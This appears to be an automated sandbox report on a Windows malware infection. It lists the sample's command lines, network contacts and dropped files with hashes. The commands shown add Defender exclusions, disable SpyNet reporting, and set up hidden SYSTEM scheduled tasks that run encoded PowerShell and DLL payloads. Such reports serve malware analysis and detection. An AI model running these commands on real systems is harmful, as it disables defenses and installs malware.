C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gOoXQPhFC" /SC once /ST 04:34:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gOoXQPhFC"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gOoXQPhFC"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "mRaseIvrfxDtBOYKW" /SC once /ST 08:24:39 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe\" Ty /Cisite_idYrv 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "mRaseIvrfxDtBOYKW"

C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe

C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe Ty /Cisite_idYrv 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bdnnguwcOLBYKAjbbA"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\yvWovCiVU\amDviS.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eGwAoTnpAObQfPU" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "eGwAoTnpAObQfPU2" /F /xml "C:\Program Files (x86)\yvWovCiVU\JZfiWJf.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "eGwAoTnpAObQfPU"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "eGwAoTnpAObQfPU"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ALvbXdfFiQJKEp" /F /xml "C:\Program Files (x86)\LCifMpYymZWU2\eYZkXIj.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "BIiSjOILpRnDn2" /F /xml "C:\ProgramData\WkkDuRgYrrqHXcVB\jsGyjxb.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "uCAhUOuaRBfXDMltv2" /F /xml "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\AZEYcNv.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "cLzKLCJHWfKFSkdKasF2" /F /xml "C:\Program Files (x86)\mVqQIGUXDOgrC\AoTCTed.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "FTXCzbcEvROqagNdd" /SC once /ST 05:12:17 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\IzRZTwSZebgYVSAl\rGBfzonX\YTmebuT.dll\",#1 /acsite_idhae 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "FTXCzbcEvROqagNdd"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\rGBfzonX\YTmebuT.dll",#1 /acsite_idhae 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\rGBfzonX\YTmebuT.dll",#1 /acsite_idhae 385118

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "FTXCzbcEvROqagNdd"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "mRaseIvrfxDtBOYKW"

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
US 172.67.169.89:443 yip.su tcp
US 104.20.68.143:443 pastebin.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 218.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 shipofdestiny.com udp
AT 5.42.64.17:80 5.42.64.17 tcp
RU 193.233.132.175:80 tcp
US 8.8.8.8:53 sty.ink udp
DE 185.172.128.144:80 185.172.128.144 tcp
US 8.8.8.8:53 operandotwo.com udp
US 8.8.8.8:53 namemail.org udp
US 8.8.8.8:53 cu82342.tw1.ru udp
US 8.8.8.8:53 net.geo.opera.com udp
US 172.67.152.98:443 shipofdestiny.com tcp
US 172.67.152.98:443 shipofdestiny.com tcp
US 172.67.160.247:443 operandotwo.com tcp
US 172.67.200.219:443 sty.ink tcp
US 172.67.200.219:443 sty.ink tcp
NL 185.26.182.111:80 net.geo.opera.com tcp
RU 176.57.210.144:443 cu82342.tw1.ru tcp
NL 185.26.182.111:443 net.geo.opera.com tcp
US 8.8.8.8:53 lawyerbuyer.org udp
US 188.114.96.2:443 lawyerbuyer.org tcp
US 188.114.96.2:443 lawyerbuyer.org tcp
US 8.8.8.8:53 d.392391234.xyz udp
FR 95.164.45.22:443 d.392391234.xyz tcp
FR 95.164.45.22:443 d.392391234.xyz tcp
US 8.8.8.8:53 guseman.org udp
US 172.67.173.167:443 guseman.org tcp
DE 185.172.128.90:80 185.172.128.90 tcp
US 8.8.8.8:53 89.169.67.172.in-addr.arpa udp
US 8.8.8.8:53 143.68.20.104.in-addr.arpa udp
US 8.8.8.8:53 98.152.67.172.in-addr.arpa udp
US 8.8.8.8:53 144.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 17.64.42.5.in-addr.arpa udp
US 8.8.8.8:53 219.200.67.172.in-addr.arpa udp
US 8.8.8.8:53 247.160.67.172.in-addr.arpa udp
US 8.8.8.8:53 111.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 144.210.57.176.in-addr.arpa udp
US 8.8.8.8:53 2.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 22.45.164.95.in-addr.arpa udp
US 8.8.8.8:53 167.173.67.172.in-addr.arpa udp
US 8.8.8.8:53 90.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 udp
DE 185.172.128.65:80 tcp
DE 185.172.128.65:80 tcp
US 8.8.8.8:53 65.128.172.185.in-addr.arpa udp
US 188.114.96.2:443 lawyerbuyer.org tcp
US 8.8.8.8:53 udp
DE 185.172.128.144:80 tcp
US 188.114.96.2:443 lawyerbuyer.org tcp
DE 185.172.128.209:80 185.172.128.209 tcp
US 188.114.96.2:443 lawyerbuyer.org tcp
US 188.114.96.2:443 lawyerbuyer.org tcp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 34.117.186.192:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
NL 185.26.182.117:443 tcp
NL 185.26.182.94:443 tcp
NL 82.145.217.121:443 tcp
GB 95.101.143.243:443 tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 104.18.11.89:443 download5.operacdn.com tcp
US 8.8.8.8:53 89.11.18.104.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 232.135.221.88.in-addr.arpa udp
DE 185.172.128.65:80 185.172.128.65 tcp
US 8.8.8.8:53 f901d83f-bf93-4ba3-a81a-54367772aec3.uuid.statstraffic.org udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 server13.statstraffic.org udp
US 8.8.8.8:53 stun1.l.google.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
BE 172.253.120.127:19302 stun1.l.google.com udp
BG 185.82.216.104:443 server13.statstraffic.org tcp
US 8.8.8.8:53 carsalessystem.com udp
US 172.67.221.71:443 carsalessystem.com tcp
US 8.8.8.8:53 127.120.253.172.in-addr.arpa udp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 104.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 71.221.67.172.in-addr.arpa udp
BG 185.82.216.104:443 server13.statstraffic.org tcp
US 8.8.8.8:53 219.135.221.88.in-addr.arpa udp
NL 185.26.182.123:443 tcp
NL 185.26.182.123:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp
N/A 195.20.16.45:80 tcp
US 8.8.8.8:53 udp
N/A 172.67.188.178:443 tcp
US 8.8.8.8:53 udp
US 104.26.8.59:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 121.150.80.3.in-addr.arpa udp
US 8.8.8.8:53 105.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 202.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.179.238:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 142.250.178.1:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 1.178.250.142.in-addr.arpa udp
GB 142.250.179.238:443 clients2.google.com tcp
US 8.8.8.8:53 api4.check-data.xyz udp
US 44.240.147.44:80 api4.check-data.xyz tcp
US 8.8.8.8:53 44.147.240.44.in-addr.arpa udp
US 8.8.8.8:53 server13.statstraffic.org udp
BG 185.82.216.104:443 server13.statstraffic.org tcp

Files

memory/4204-0-0x0000015A4F430000-0x0000015A4F43C000-memory.dmp

memory/4204-1-0x00007FFB35A30000-0x00007FFB364F1000-memory.dmp

memory/4204-2-0x0000015A69A00000-0x0000015A69A10000-memory.dmp

memory/4204-3-0x0000015A6A800000-0x0000015A6A876000-memory.dmp

memory/4204-4-0x0000015A6A780000-0x0000015A6A79E000-memory.dmp

memory/4204-5-0x0000015A6A7A0000-0x0000015A6A7FE000-memory.dmp

memory/1512-6-0x0000000000400000-0x0000000000408000-memory.dmp

memory/1512-7-0x00000000745E0000-0x0000000074D90000-memory.dmp

memory/1512-8-0x0000000002B60000-0x0000000002B70000-memory.dmp

memory/4204-9-0x00007FFB35A30000-0x00007FFB364F1000-memory.dmp

C:\Users\Admin\Pictures\kYGORkNl9EO4o6fyADcic3qo.exe

MD5 5b423612b36cde7f2745455c5dd82577
SHA1 0187c7c80743b44e9e0c193e993294e3b969cc3d
SHA256 e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09
SHA512 c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c

C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe

MD5 9cd8f017fce108d15a3da05ad68dc88d
SHA1 8a934caca9bc4aae78caf22ffb40fa52d0539bd2
SHA256 41cfcd320e71a9703685c95859dec2262cc459c3a5d6d4e2e4379d8f9695c854
SHA512 bd6fbdab2e4a67f09afb5c88441410ff5efa567da2ae0089da210f68f79e87ac7b04da43e710ec4fcf25ceef28dc13bcdff6335f37e35017f6b0039c53c4dc5b

memory/832-36-0x0000000000D90000-0x0000000000DFE000-memory.dmp

memory/832-35-0x0000000000E70000-0x0000000000F70000-memory.dmp

memory/832-37-0x0000000000400000-0x0000000000B0D000-memory.dmp

C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe

MD5 fd4e39b84976a233a5ec92fbe255ff48
SHA1 29fca043ec03807ad528fa222e9bb4039c0a64aa
SHA256 8004dce352977242b0ac40ede92b2eda494a22a3cb1366ae7336810f4cd364bc
SHA512 4f87776eb6687f636d6a8b0d931d1e789c49c624d9519a1afc1eceef385d4da3d9da1a1e7e28e4a8beb50de76d9bfab8eefc37479ea2148cbc681c0551c4a0dd

C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe

MD5 c4557771f0454d0924cff29fe81f2fb1
SHA1 905dfbc56726538788fde25dfc364509b220f3f3
SHA256 c8dba8d9f5446614284942a20ccc34a939be7ef2183f7da8e89ed4848a11cbaf
SHA512 5822384e112b7c92e1d0c2bf3d4b6017f0560c8f6fa0608881e7bd3f04acd8eab9a02df6ae8c13c22cd813aabbc6137cd27c0f72d847c0ac526a0fd7dd562e43

memory/4640-66-0x0000000002B20000-0x0000000002F1F000-memory.dmp

memory/4640-67-0x0000000002F20000-0x000000000380B000-memory.dmp

memory/2980-68-0x0000000002F50000-0x000000000383B000-memory.dmp

memory/2980-69-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/2980-70-0x0000000002A40000-0x0000000002E42000-memory.dmp

C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe

MD5 7960d8afbbac06f216cceeb1531093bb
SHA1 008221bf66a0749447cffcb86f2d1ec80e23fc76
SHA256 f6e476e8ccb571b9d7a76234953ad428e883ff4712b0062498ba3275d9749b84
SHA512 35d12e81eb892aeb2237049beca61a81469dea5b1c9b7a0b9f49fbf95a95c756509d9e76c732fb10b504f9f9692e1fbe83ea2fd09d791f793a928c01974b8147

memory/4640-83-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/4912-87-0x00000000008D0000-0x000000000093E000-memory.dmp

memory/4912-89-0x00000000745E0000-0x0000000074D90000-memory.dmp

C:\Users\Admin\Pictures\PBCfG3wrCyp60tNkAdjwRCEQ.exe

MD5 e2a6c1f58b137874e490b8d94382fcdb
SHA1 71529c5d708091b1e1a580227dc52e62a140edd1
SHA256 4801879a7afb9d03f7edcbe76cd9306cb024d80abc8512c4995aa97e8fd52437
SHA512 24d12ce668e5189a4ba80520a4eaf480d17d3a07d8d0d4312964968f8489143df225881ec70e39e0c62e381061626801ead72d70cea164e2c3870bfbd7bc4eff

memory/4912-102-0x00000000052C0000-0x00000000052D0000-memory.dmp

memory/1464-104-0x0000000002720000-0x000000000276A000-memory.dmp

memory/1464-106-0x0000000000400000-0x0000000000B06000-memory.dmp

memory/5084-107-0x0000000000400000-0x000000000046D000-memory.dmp

memory/1464-108-0x0000000000C70000-0x0000000000C71000-memory.dmp

memory/1464-110-0x0000000000C70000-0x0000000000C71000-memory.dmp

memory/1464-112-0x0000000000C70000-0x0000000000C71000-memory.dmp

memory/1464-113-0x0000000000C80000-0x0000000000D80000-memory.dmp

memory/5084-114-0x0000000000400000-0x000000000046D000-memory.dmp

memory/4912-115-0x0000000002CA0000-0x0000000004CA0000-memory.dmp

memory/5084-116-0x0000000000400000-0x000000000046D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\un4.0.exe

MD5 ab1dbed7cd6c1bf01ab77d12d1b86cd8
SHA1 ccfd0f691e8e75ed0fb9a436032167cc633ce68b
SHA256 b5389bf868f62fcbdebccd4a8014ab6b3c0164de09913f34d6fa18f36cbcb1a5
SHA512 1f83592156ee5479024aad34b1f856826c869758172d44b5d3052cf7b076ece37fde55a1d6ec572aceeac13172b48c65733c008f066fade447ec807837d26587

C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe

MD5 ba0d14f5874f5d2e7fb5c6a1a9b675dc
SHA1 a99194ec87f921dfc74890dda2b5db6372a44547
SHA256 6d1698c7355202b13ab98193ca2b3cf9e159de306885b630c7a5714a0aa651df
SHA512 88f8357c673b49f0896721a68fc330497579d082b772f8640db96198c92edb5aca5239f39b6a427f748d49d2288ce876c1458f321d1ceb88adec1bc437385741

memory/1352-142-0x0000000002BA0000-0x0000000002FA8000-memory.dmp

memory/856-143-0x0000000000B80000-0x0000000000BA7000-memory.dmp

memory/856-144-0x0000000000400000-0x0000000000AEA000-memory.dmp

memory/1464-146-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-150-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-151-0x0000000003190000-0x0000000003290000-memory.dmp

memory/4912-149-0x00000000745E0000-0x0000000074D90000-memory.dmp

memory/1464-148-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-147-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-153-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-154-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-159-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-160-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-158-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-157-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-162-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-164-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-163-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-156-0x0000000003190000-0x0000000003290000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\un4.1.exe

MD5 eee5ddcffbed16222cac0a1b4e2e466e
SHA1 28b40c88b8ea50b0782e2bcbb4cc0f411035f3d5
SHA256 2a40e5dccc7526c4982334941c90f95374460e2a816e84e724e98c4d52ae8c54
SHA512 8f88901f3ebd425818db09f268df19ccf8a755603f04e9481bcf02b112a84393f8a900ead77f8f971bfa33fd9fa5636b7494aaee864a0fb04e3273911a4216dc

memory/1464-174-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-173-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-175-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-180-0x0000000003190000-0x0000000003290000-memory.dmp

memory/5084-181-0x0000000003720000-0x0000000003B20000-memory.dmp

memory/1464-182-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-185-0x0000000003190000-0x0000000003290000-memory.dmp

memory/5084-184-0x00007FFB53BB0000-0x00007FFB53DA5000-memory.dmp

memory/1464-187-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-189-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-194-0x0000000003290000-0x00000000032D0000-memory.dmp

C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe

MD5 4204b9d4c4df5c4b4d67922db24f342a
SHA1 9255b5e94028f3f55adda2576d60bd39452eaf08
SHA256 62cd7b447bdee3ec1670c92d9585e1fddbaa5d4ee824dee8f15940005bf95414
SHA512 0b4ed4d6397c9f34cf2c72d9c581a6e5d94eabf395da0010073b1600883dac6fcc48c1606ffee29952bd60707caf03b8a6d6cf644b2ac668306b4a418d726423

memory/1464-195-0x0000000003290000-0x00000000032D0000-memory.dmp

memory/1404-193-0x0000000000E90000-0x0000000000E99000-memory.dmp

memory/5084-188-0x0000000076490000-0x00000000766A5000-memory.dmp

memory/1464-183-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1404-205-0x0000000002AB0000-0x0000000002EB0000-memory.dmp

memory/856-207-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/1404-215-0x0000000076490000-0x00000000766A5000-memory.dmp

memory/1404-209-0x00007FFB53BB0000-0x00007FFB53DA5000-memory.dmp

memory/5084-179-0x0000000003720000-0x0000000003B20000-memory.dmp

memory/1464-178-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-177-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-176-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-155-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1352-145-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/440-257-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp

memory/440-259-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp

memory/440-275-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp

memory/440-271-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp

memory/832-284-0x0000000000400000-0x0000000000B0D000-memory.dmp

memory/440-283-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp

memory/440-281-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp

C:\Windows\System32\GroupPolicy\gpt.ini

MD5 8ef9853d1881c5fe4d681bfb31282a01
SHA1 a05609065520e4b4e553784c566430ad9736f19f
SHA256 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA512 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

memory/440-262-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp

C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe

MD5 bd950871b09f9fcfa3466fb1b2b5d556
SHA1 0722e0ddae63ea95c95fb2fa49300c452de8ddc1
SHA256 e73bcab8e2404cb75d65a8ccd9f256d87ad77f432663f04487628afd12a30051
SHA512 f7cad1bc16d3aa8456c15f5c57828afa5d6d764aed2b23b71ac8f95ad51796be17e14943c7c97133414f7f92c91b741f3c773ed6266597e9c78d7970ccaee2b7

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2403281421293134424.dll

MD5 2c8ab707b79399f1cbaf2cd17003d614
SHA1 034bd6bbd7123627ca202b6b35b9018261fc03d5
SHA256 c8cbcc07e14d8e019e5927126fb5ff30ec1d77f9f351d5738b73c228f02eaede
SHA512 d0f559744068666b3d3cfe9db4ea00ee40a5cc9ab70dfa095c3cbb19dd2fff13746db1bec814ce4faff6df6ebaaa39af62e7e55dd43bea5be6ef356a9c127888

C:\Users\Admin\AppData\Roaming\Temp\Task.bat

MD5 11bb3db51f701d4e42d3287f71a6a43e
SHA1 63a4ee82223be6a62d04bdfe40ef8ba91ae49a86
SHA256 6be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331
SHA512 907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 5f5e97ba939baf708a1b2b1bb7acbb7e
SHA1 194294ed2caec5608dbe4b9f3d00bbf9f738050e
SHA256 733e6e77f50f0e5e30df357748ae8cddde48e6a35e50ec77f84765e8e19215a8
SHA512 94acf10f3b6bf77c5ed01932ee3607deede25cbb453cf3ab7a8ae5f5775d2152d88508b991efacf264d5e7b51880de59fbdf0ed7932ee940cd223d1de8b9e800

C:\Users\Admin\Pictures\EwbpoERL2KXj9VGzo9QBTWpU.exe

MD5 aaab26342c7e93c5b29fcaec60dd84d9
SHA1 a02b822ee13767ca224a37494adda8ad3b34db92
SHA256 30b64050f5874a74cb1ddc70578c6c30d70edd4d43f8b91f4597aa3d1a405648
SHA512 ad01fdbac1fa2b3ccf62d4c76d458bb5288a6e1664a6188417e5872104474567765ff364e66c5a66d350f921c542a43fde1ba301af60b76bac35d0c7541c9097

memory/1464-406-0x0000000000400000-0x0000000000B06000-memory.dmp

memory/4640-413-0x0000000000400000-0x0000000000ECD000-memory.dmp

